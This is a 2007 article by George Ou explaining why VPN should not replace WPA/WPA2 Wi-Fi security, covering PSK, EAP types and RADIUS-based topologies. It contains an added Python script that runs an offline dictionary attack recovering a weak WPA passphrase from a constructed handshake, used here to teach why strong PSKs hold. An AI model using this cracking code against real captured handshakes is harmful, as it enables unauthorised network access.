Version 1.0
May 14, 2007
Why VPN can't replace Wi-Fi security
By George Ou

Every time the subject of wireless LAN security comes up, people ask me about VPN as a solution for securing
Wi-Fi. (Wi-Fi is the common marketing name for 802.11 wireless LANs). I've always told people that VPN security
shouldn't be a substitute for good Wi-Fi security, and I even posted a comprehensive guide to enterprise wireless
LAN security, but a loyal group of VPN-only supporters has always argued for a VPN-only alternative. I'm going to
explain VPN and Wi-Fi security as best I can and why there is a right time and right place for each architecture.
The VPN-only camp

The VPN-only camp consists of companies that have a vested interest in selling VPN solutions and some
individuals who are more familiar with VPN than with Wi-Fi security, so every problem looks like a VPN-type
problem because that's within their comfort range. It's a classic case of when all you have is a hammer,
everything looks like a nail. They'll tell you not to worry about Wi-Fi security and just use VPN. The typical
argument from the VPN-only camp is that the IEEE 802.11 standards body can't be trusted to come up with a
good solution for Wi-Fi security. To bolster their claims that Wi-Fi can't be trusted, the VPN-only camp will cite the
example of the WEP debacle and/or they'll even point out how "WPA is cracked."

Was WPA really cracked?

Anyone who states that "WPA was cracked" doesn't really understand what WPA is or what cracked means. What
they're actually referring to is the fact that a certain simple mode of WPA (designed primarily for home use), which
uses PSK (pre-shared keys), can be attacked offline from a captured four-way handshake when a simple,
easy-to-guess PSK is in use. But that's only an example of a poor deployment of WPA-PSK; the cipher and the key
derivation aren't being broken, the passphrase is being guessed. A random 10-character alphanumeric PSK (or
longer) gives roughly 62^10, about 8 x 10^17, possibilities, which makes it impractical to crack with dictionary
attacks. I can just as easily point out that the same mistakes can be made in certain VPN deployments that also
make use of pre-shared keys.

Is WEP a permanent indictment of IEEE 802.11?

There is no question that WEP is completely broken beyond redemption. 802.11 WEP encryption was designed
during the late 90s during a time of strict U.S. export restrictions, when good cryptography was considered
advanced munitions. I've had sources familiar with that process tell me that stronger encryption algorithms were
shunned for fear of Wi-Fi products being banned for export. Not surprisingly, it took less than two years for the
cryptographic researchers (Fluhrer-Mantin-Shamir) to demonstrate serious flaws with WEP. But something
designed in the late 90s for exportability should not be a permanent indictment of Wi-Fi security or the
competence of the IEEE 802.11 standards body. If that's the standard we're going to judge by, we can pretty
much shun everything on the Internet. Moving beyond the WEP debacle, the Wi-Fi industry couldn't wait for the
IEEE to fix the standard, so they adopted TKIP (a patched version of WEP) with the WPA industry standard.

Bad implementations should be shunned, not entire categories

There are other bad implementations of VPN and Wi-Fi that have poorly designed authentication mechanisms.
ASLEAP, for example, is a tool that will easily crack both LEAP Wi-Fi 802.1x authentication and PPTP VPN
authentication in nearly identical fashion, because both rest on the same weak MS-CHAP challenge/response
exchange, yet both protocols are (unfortunately) very popular. The argument should be made against poor
cryptographic implementations, not against Wi-Fi security in general.

Wi-Fi and VPN security defined
Modern Wi-Fi security

WPA and WPA2 security came from an industry association called the Wi-Fi Alliance, and both incorporate solid
cryptographic principles and algorithms. WPA was based on the original draft of the 802.11i standard, and WPA2
was based on the finalized version of 802.11i. Wi-Fi encryption happens on the "data link layer" (Layer 2 of the
OSI model) and happens transparently in hardware and firmware. Note that there are exceptions to the Layer 2
rule with the advent of switched Wi-Fi topology, where access points all tunnel to a centrally managed switch
(controller) and encryption may terminate there rather than at the access point.

For encryption, the difference between WPA and WPA2 is that WPA2 (certified against the finalized 802.11i
standard) requires AES-CCMP, with TKIP retained for backward compatibility with WPA clients, whereas WPA
mandated only TKIP encryption with AES support optional. TKIP keeps WEP's RC4 cipher but adds per-packet key
mixing and a message integrity check, which closes the key-scheduling weakness that broke WEP; AES is the
cipher the U.S. government approves for protecting classified information. At the time of writing neither TKIP nor
AES-CCMP was considered broken, though AES-CCMP is unquestionably superior and should be the default
wherever the client base allows it. (Practical attacks on TKIP were published in 2008 and the Wi-Fi Alliance has
since deprecated it; treat it as a legacy compatibility mode only.)
Copyright ©2007 CNET Networks, Inc. All rights reserved.
For more downloads and a free TechRepublic membership, please visit http://techrepublic.com.com/2001-6240-0.html

WPA/WPA2 has two modes of authentication and access control: home PSK mode and enterprise 802.1x mode.
In home mode the 256-bit pairwise master key is derived from the passphrase with PBKDF2 (4,096 iterations of
HMAC-SHA1), which makes every dictionary guess expensive, and the SSID is used as the salt, which rules out
pre-computed hash tables unless the attacker targets a common SSID. The enterprise mode of WPA calls for
802.1x, a standard for port-based network access control that is open to a wide range of EAP (Extensible
Authentication Protocol) types. The stronger EAP types use PKI digital certificates for strong authentication:
EAP-TLS authenticates both the server and the client with certificates, while PEAP and EAP-TTLS use a server
certificate to build a TLS tunnel and then authenticate the user (typically by password) inside it, so their
strength depends on the client actually validating the server's certificate. Weaker EAP types, such as Cisco
LEAP, expose an MS-CHAP challenge/response pair on the air that can be attacked offline with a dictionary.
Other weak implementations, like Cisco EAP-FAST, are typically deployed with anonymous (unauthenticated)
in-band PAC provisioning, which lets a rogue server impersonate the real one and leaves them almost as easy to
attack as LEAP.
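To make the "Was WPA really cracked?" argument and the home-mode derivation just described concrete, here is an added Python example (not code from the article) that implements the 802.11i passphrase-to-PMK derivation (PBKDF2-HMAC-SHA1, 4,096 iterations, SSID as salt), the PRF-512 pairwise key expansion and the WPA2 EAPOL-Key MIC, and then runs an offline dictionary attack against a four-way handshake that it constructs itself. The SSID, passphrases, MAC addresses, wordlist and the EAPOL message-2 bytes are all constructed for the example; nothing here comes from a real capture.

```python
"""WPA/WPA2-PSK key derivation and an offline dictionary attack against a
constructed four-way handshake. Added example, not part of the original article."""
import hashlib
import hmac
import os


def derive_pmk(passphrase: str, ssid: str) -> bytes:
    # 802.11i: PMK = PBKDF2-HMAC-SHA1(passphrase, SSID, 4096 iterations, 256 bits).
    # The SSID is the salt, so the same passphrase yields a different PMK on a
    # different network; a precomputed table only pays off against a common SSID.
    return hashlib.pbkdf2_hmac("sha1", passphrase.encode(), ssid.encode(), 4096, 32)


def derive_ptk(pmk: bytes, aa: bytes, spa: bytes, anonce: bytes, snonce: bytes) -> bytes:
    # PRF-512 from 802.11i: concatenated HMAC-SHA1(PMK, label || 0x00 || data || i).
    data = min(aa, spa) + max(aa, spa) + min(anonce, snonce) + max(anonce, snonce)
    out = b"".join(
        hmac.new(pmk, b"Pairwise key expansion" + b"\x00" + data + bytes([i]), hashlib.sha1).digest()
        for i in range(4)
    )
    return out[:64]  # KCK = first 16 bytes, KEK = next 16, TK = next 16


def eapol_mic(kck: bytes, eapol_frame: bytes) -> bytes:
    # WPA2 (key descriptor version 2): MIC = HMAC-SHA1(KCK, frame with MIC zeroed)[:16].
    return hmac.new(kck, eapol_frame, hashlib.sha1).digest()[:16]


def build_handshake(passphrase: str, ssid: str) -> dict:
    """Constructed stand-in for a sniffed handshake. An attacker on the air sees
    everything returned here except the passphrase used to make it."""
    aa, spa = bytes.fromhex("001122334455"), bytes.fromhex("66778899aabb")  # constructed MACs
    anonce, snonce = os.urandom(32), os.urandom(32)
    # Message 2 of the handshake with its 16-byte MIC field zeroed (the MIC input).
    eapol_m2 = b"\x01\x03\x00\x75\x02\x01\x0a" + snonce + b"\x00" * 16 + b"\x00" * 40
    kck = derive_ptk(derive_pmk(passphrase, ssid), aa, spa, anonce, snonce)[:16]
    return {"ssid": ssid, "aa": aa, "spa": spa, "anonce": anonce, "snonce": snonce,
            "eapol_m2": eapol_m2, "mic": eapol_mic(kck, eapol_m2)}


def crack_psk(hs: dict, wordlist):
    """Offline dictionary attack: re-derive PMK -> PTK -> MIC for each candidate and
    compare with the captured MIC. Cost per guess is dominated by the 4096 PBKDF2
    rounds, which is what makes the attack slow, but not impossible, for weak PSKs."""
    for candidate in wordlist:
        pmk = derive_pmk(candidate, hs["ssid"])
        kck = derive_ptk(pmk, hs["aa"], hs["spa"], hs["anonce"], hs["snonce"])[:16]
        if hmac.compare_digest(eapol_mic(kck, hs["eapol_m2"]), hs["mic"]):
            return candidate
    return None


# Constructed wordlist standing in for a real dictionary.
WORDLIST = ["12345678", "password", "letmein", "password123", "qwertyuiop"]

if __name__ == "__main__":
    weak = build_handshake("password123", "CorpWiFi")
    print("weak PSK recovered:", crack_psk(weak, WORDLIST))
    strong = build_handshake("k7Qz2mW9pL", "CorpWiFi")  # 10 random alphanumerics
    print("strong PSK recovered:", crack_psk(strong, WORDLIST))
```

The attack recovers "password123" and returns nothing for the random 10-character key, because that key is in no wordlist and enumerating 62^10 candidates at 4,096 PBKDF2 rounds each is out of reach. The SSID salt is why derive_pmk("password123", "CorpWiFi") and derive_pmk("password123", "HomeWiFi") differ.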
Modern VPN security

VPN (virtual private network) is a privacy technology where the encryption usually happens at the network layer
(Layer 3 of the OSI model) with technologies such as IPSEC, PPTP, and L2TP. More recent VPN implementations
have moved to SSL tunneling for ease of firewall, NAT, and proxy traversal, where the encryption happens above
the transport layer (the presentation layer, Layer 6, in OSI terms). Note that most VPN solutions give the client a
virtual network interface with an IP address on the remote LAN by carrying IP (or, in the case of PPTP and L2TP, a
PPP link) inside the IPSEC or SSL tunnel. Some SSL-tunneling VPN vendors (not to be confused with
application-layer, browser-only SSL-VPN portals), like Cisco, use ActiveX and/or Java installers to make it
possible to rapidly deploy the VPN client from a Web-based install. Microsoft will soon begin to incorporate a new
SSL-tunneling technology, called SSTP, into Windows' built-in VPN client, which currently supports only PPTP
and L2TP. (SSTP shipped in Windows Vista SP1 and Windows Server 2008.)

Encryption and authentication used in VPN vary depending on the implementation. PPTP VPNs use RC4 (40-, 56-,
and 128-bit MPPE), whereas IPSEC and L2TP/IPSEC can use a wide range of encryption algorithms, like DES
(56-bit), 3DES (168-bit), and AES (128-, 192-, and 256-bit). Authentication mechanisms in VPN can be weak, like
PPTP, whose MS-CHAP challenge/response exchange can be captured and attacked offline with a dictionary, or
they can be strong PKI-based implementations, like L2TP/IPSEC, where the IPSEC layer authenticates server and
client with digital certificates before any user credential is sent inside the tunnel. Some IPSEC solutions will have
the option of using a pre-shared key or PKI-based digital certificates. If this sounds a lot like Wi-Fi security above,
it's not your imagination: the principles of cryptography are universal.

Where VPN and Wi-Fi security fit in

VPN and Wi-Fi security each has its role in network security. VPNs allow you to connect securely over any
network (including the Internet) whether you're using a dial-up modem or a Wi-Fi hotspot connection. This allows
VPN to work from virtually anywhere in the world that provides Internet access. Wi-Fi security, on the other hand,
offers you security only at the data link layer between your mobile device and the wireless access point, which
usually means it can only work locally in a LAN environment. But Wi-Fi security solutions provide significantly
more speed, less overhead, and less complexity. The purpose of Wi-Fi security is to give you equal or better
security than using a wired connection to the LAN with an equal level of functionality.

When you're using a VPN connection, the connection to the LAN over the Internet doesn't happen until the user
logs in, fires up the VPN client software, and manually starts a connection. With Wi-Fi security, it is possible to
use machine authentication to securely connect the computer before the user even logs into the PC. That means
maintenance tasks like Windows Update, enterprise management tools, group policy updates prior to or during
login, and first-time logins by new users can all be supported. When a user wakes a laptop and logs in, it
automatically and instantly logs the user into the wireless LAN with no user interaction. Centralized management
and distribution of Wi-Fi client configuration make Wi-Fi security very appealing to the enterprise. There are also
cases where VPN simply can't do the job at all, because many embedded devices, like Wi-Fi VoIP phones, Wi-Fi
label printers, and Wi-Fi barcode scanners, can't support VPN but do support Wi-Fi WPA/WPA2 security.
Wi-Fi security coexisting with VPN security

In the network topology diagram shown here, we have a hybrid solution where both VPN and Wi-Fi security are
deployed in an enterprise network. The VPN gateway provides encrypted connections to users coming from the
Internet, while the access points (more than one represented) provide wireless LAN connectivity for local devices.
The Wi-Fi network here is a closed network, where access control and authentication are performed before the
client's port is opened (the 802.1x controlled port stays blocked until authentication succeeds) and the encryption
is performed in hardware for everything at Layer 2 and above. This topology utilizes a centralized RADIUS
authentication model that is shared by all the access points and VPN gateways. The access points and VPN
gateway are the network access devices that forward RADIUS authentication requests to the RADIUS server,
which in turn checks with the user directory (LDAP, Active Directory, Novell, etc.) for verification. This offers true
single sign-on for both Wi-Fi and VPN security without duplicating authentication hardware.
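The hybrid topology above hinges on every network access device (each access point and the VPN gateway) speaking RADIUS to the same server. The following Python script, added here as an illustration and not code from the article or from any vendor, walks one Access-Request/Access-Accept exchange from RFC 2865 for both the NAS side and the server side, using constructed NAS names, shared secrets and a one-user directory. It uses the plain User-Password attribute (what a VPN gateway doing PAP would send); 802.1x access points instead carry EAP inside RADIUS EAP-Message attributes, but the per-NAS shared secret and Response Authenticator mechanics shown here are the same. All function and variable names are the example's own.

```python
"""RADIUS Access-Request / Access-Accept exchange between a NAS (access point or
VPN gateway) and a RADIUS server, per RFC 2865. Added example, not from the article."""
import hashlib
import hmac
import os
import struct

ACCESS_REQUEST, ACCESS_ACCEPT, ACCESS_REJECT = 1, 2, 3
USER_NAME, USER_PASSWORD, NAS_IDENTIFIER = 1, 2, 32


def _attr(attr_type: int, value: bytes) -> bytes:
    # Attribute = Type(1) || Length(1, includes header) || Value
    return struct.pack("!BB", attr_type, len(value) + 2) + value


def _parse_attrs(data: bytes) -> dict:
    attrs, i = {}, 0
    while i < len(data):
        attr_type, length = data[i], data[i + 1]
        attrs[attr_type] = data[i + 2:i + length]
        i += length
    return attrs


def hide_password(password: bytes, secret: bytes, authenticator: bytes) -> bytes:
    # RFC 2865 5.2: XOR each 16-byte block with MD5(secret || previous cipher block),
    # seeded with the Request Authenticator. Obfuscation only; it rests on the secret.
    padded = password + b"\x00" * (-len(password) % 16)
    out, prev = b"", authenticator
    for i in range(0, len(padded), 16):
        pad = hashlib.md5(secret + prev).digest()
        block = bytes(x ^ y for x, y in zip(padded[i:i + 16], pad))
        out, prev = out + block, block
    return out


def reveal_password(hidden: bytes, secret: bytes, authenticator: bytes) -> bytes:
    out, prev = b"", authenticator
    for i in range(0, len(hidden), 16):
        pad = hashlib.md5(secret + prev).digest()
        out += bytes(x ^ y for x, y in zip(hidden[i:i + 16], pad))
        prev = hidden[i:i + 16]
    return out.rstrip(b"\x00")


def nas_build_request(username: bytes, password: bytes, nas_id: bytes, secret: bytes, ident: int = 1) -> bytes:
    # NAS side: a fresh 16-byte Request Authenticator for every request.
    req_auth = os.urandom(16)
    attrs = (_attr(USER_NAME, username)
             + _attr(USER_PASSWORD, hide_password(password, secret, req_auth))
             + _attr(NAS_IDENTIFIER, nas_id))
    return struct.pack("!BBH", ACCESS_REQUEST, ident, 20 + len(attrs)) + req_auth + attrs


def server_handle(request: bytes, secrets_by_nas: dict, directory: dict):
    """Server side: pick the shared secret for the sending NAS, recover the password,
    check it against the shared user directory, and sign the reply."""
    code, ident, _length = struct.unpack("!BBH", request[:4])
    req_auth, attrs = request[4:20], _parse_attrs(request[20:])
    secret = secrets_by_nas.get(attrs.get(NAS_IDENTIFIER))
    if code != ACCESS_REQUEST or secret is None:
        return None  # unknown NAS: RFC 2865 says silently discard
    password = reveal_password(attrs[USER_PASSWORD], secret, req_auth)
    reply_code = ACCESS_ACCEPT if directory.get(attrs[USER_NAME]) == password else ACCESS_REJECT
    reply_attrs = b""
    header = struct.pack("!BBH", reply_code, ident, 20 + len(reply_attrs))
    # Response Authenticator = MD5(Code || ID || Length || RequestAuth || Attributes || Secret)
    resp_auth = hashlib.md5(header + req_auth + reply_attrs + secret).digest()
    return header + resp_auth + reply_attrs


def nas_verify_reply(request: bytes, reply, secret: bytes) -> bool:
    """NAS side: open the port only for an Access-Accept whose authenticator checks
    out under this device's own shared secret."""
    if reply is None:
        return False
    req_auth = request[4:20]
    header, resp_auth, attrs = reply[:4], reply[4:20], reply[20:]
    expected = hashlib.md5(header + req_auth + attrs + secret).digest()
    return hmac.compare_digest(expected, resp_auth) and reply[0] == ACCESS_ACCEPT


# Constructed data: two NAS devices, one RADIUS server, one user directory.
SECRETS = {b"ap-floor1": b"s3cretAP", b"vpn-gw": b"s3cretVPN"}
DIRECTORY = {b"alice": b"Tr0ub4dor&3"}


def demo(nas_id: bytes, nas_secret: bytes, username: bytes, password: bytes) -> bool:
    request = nas_build_request(username, password, nas_id, nas_secret)
    return nas_verify_reply(request, server_handle(request, SECRETS, DIRECTORY), nas_secret)


if __name__ == "__main__":
    print("AP, good password:", demo(b"ap-floor1", b"s3cretAP", b"alice", b"Tr0ub4dor&3"))
    print("VPN, same user:   ", demo(b"vpn-gw", b"s3cretVPN", b"alice", b"Tr0ub4dor&3"))
    print("VPN, bad password:", demo(b"vpn-gw", b"s3cretVPN", b"alice", b"wrong"))
    print("AP, wrong secret: ", demo(b"ap-floor1", b"wrongsecret", b"alice", b"Tr0ub4dor&3"))
```

Two things the exchange makes visible. First, the server keys everything off NAS-Identifier and one directory, so the same account works from an access point and from the VPN gateway, which is the single sign-on the topology provides. Second, the whole NAS-to-server leg rests on a per-device shared secret and MD5: a NAS with the wrong secret both garbles the password and fails to verify the reply, and anyone who can read that leg can attack the secret offline, so in practice it belongs on a management network or inside IPsec or RadSec (RADIUS over TLS).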

VPN-only network-layer security

In the network topology shown here, VPN is the only solution being used to cover both remote and local Wi-Fi
users. It works to a limited extent: laptops, Windows Mobile, Windows CE, and portable Linux devices can connect
to the internal LAN as if they were connecting through a VPN from an Internet hotspot. But embedded devices, like
Wi-Fi VoIP phones, Wi-Fi label printers, and barcode scanners, aren't so fortunate; this architecture doesn't
support them. Performance is bottlenecked at the VPN gateway, which may require an upgrade to a gigabit-capable
gateway. Local Wi-Fi users are forced through a two-phase connection, where they first associate with the open
(or weakly protected) Wi-Fi network and then fire up their VPN software; until the tunnel is up, the client sits
exposed on that wireless segment with only its host firewall for protection.

The AES encryption hardware in
the access points and wireless